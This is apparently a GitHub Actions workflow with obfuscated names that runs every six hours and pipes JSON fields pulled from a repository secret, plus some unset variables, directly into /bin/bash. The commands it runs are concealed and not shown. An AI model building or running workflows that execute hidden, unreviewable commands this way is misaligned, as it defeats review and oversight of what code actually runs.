name: liruicheng9876
on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liruicheng9876
        env:
          ckw18274: ${{ secrets.ckw18274 }}
        run: |
          echo $ckw18274 | jq -r .w8561 | /bin/bash
          echo $k9191 | jq -r .byxe2909 | /bin/bash
          echo $xhea1 | jq -r .ts2484 | /bin/bash
          echo $vz235 | jq -r .xfgt36767 | /bin/bash

